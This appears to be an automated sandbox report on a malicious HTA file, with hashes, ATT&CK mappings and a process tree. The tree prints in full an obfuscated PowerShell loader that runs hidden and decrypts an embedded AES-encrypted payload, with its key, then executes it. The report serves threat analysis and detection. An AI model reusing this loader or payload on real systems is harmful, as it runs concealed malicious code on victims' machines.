82f62251ab3149595cbbb8650c9751965643deb0b94bf072378d2995b578d67e

General

Target

opituvannya.hta
Size

62KB
MD5

c708f14c2f52a4dc08397830f236756c
SHA1

4ac6a85dd75482792aaf1bd5926f0fadb3294076
SHA256

82f62251ab3149595cbbb8650c9751965643deb0b94bf072378d2995b578d67e
SHA512

46c4826e3f06ed0e40f41a9d1ea7f9c355141cf8574f5f7742b47694aa7b9815b1019a952f2be196ee365f89ae2c367c719c680509c74e281d903be63d046a6c
SSDEEP

768:knAQQXYSMpqVHKkwIMU+B8sbo11HKZOzfUwM:eAQiYSMpmqk6pBW11HNMwM

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2592	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
2648	powershell.exe
2476	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 2592	2188	mshta.exe	28
PID 2188 wrote to memory of 2592	2188	mshta.exe	28
PID 2188 wrote to memory of 2592	2188	mshta.exe	28
PID 2188 wrote to memory of 2592	2188	mshta.exe	28
PID 2592 wrote to memory of 3060	2592	powershell.exe	30
PID 2592 wrote to memory of 3060	2592	powershell.exe	30
PID 2592 wrote to memory of 3060	2592	powershell.exe	30
PID 2592 wrote to memory of 3060	2592	powershell.exe	30
PID 3060 wrote to memory of 2648	3060	cmd.exe	32
PID 3060 wrote to memory of 2648	3060	cmd.exe	32
PID 3060 wrote to memory of 2648	3060	cmd.exe	32
PID 3060 wrote to memory of 2648	3060	cmd.exe	32
PID 3060 wrote to memory of 2476	3060	cmd.exe	33
PID 3060 wrote to memory of 2476	3060	cmd.exe	33
PID 3060 wrote to memory of 2476	3060	cmd.exe	33
PID 3060 wrote to memory of 2476	3060	cmd.exe	33

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\opituvannya.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell - }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6b0531ba3462460fd0b88c33e6f11d6d

SHA1
bdd2835eb040927a5320a2fa998a3aa4a5ef9d01

SHA256
53ec09c0f03b2bba78ae154029cf9c2db4b070af114c129c336171fcca6d65b2

SHA512
96faafd1bbaa9535b14962e87e78db1e770ec7b69847aaf0cfca903c286f3016b2667cc4577f0603bbdd787c82dedb330bc6cb6018c30b1b5f85046649e79d3f

Download Submit

Analysis

Sharing